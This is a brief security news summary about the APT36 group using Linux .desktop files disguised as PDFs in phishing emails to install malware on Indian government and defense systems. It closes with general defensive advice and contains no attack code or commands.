APT36 hackers abuse Linux .desktop files to install malware in new attacks
APT36 hackers abuse Linux .desktop files to install malware in new attacks — Linux [https://www.bleepstatic.com/content/hl-images/2023/06/22/Linux.jpg] The Pa

What’s new: APT36, a Pakistani cyber espionage group, is exploiting Linux .desktop files to deploy malware in attacks targeting Indian government and defense entities. The attacks, which began on August 1, 2025, involve phishing emails containing ZIP archives with malicious .desktop files disguised as PDFs. These files execute hidden commands to download and run malware, enabling data exfiltration and persistent access.
Who’s affected
Government and defense organizations in India are the primary targets of these attacks, which aim for data exfiltration and ongoing espionage.
What to do
- Educate users about the risks of opening unexpected email attachments, especially ZIP files.
- Implement security measures to monitor and block the execution of .desktop files from untrusted sources.
- Regularly update and patch Linux systems to mitigate vulnerabilities.
- Consider using endpoint detection and response (EDR) solutions that can identify and respond to unusual file behaviors.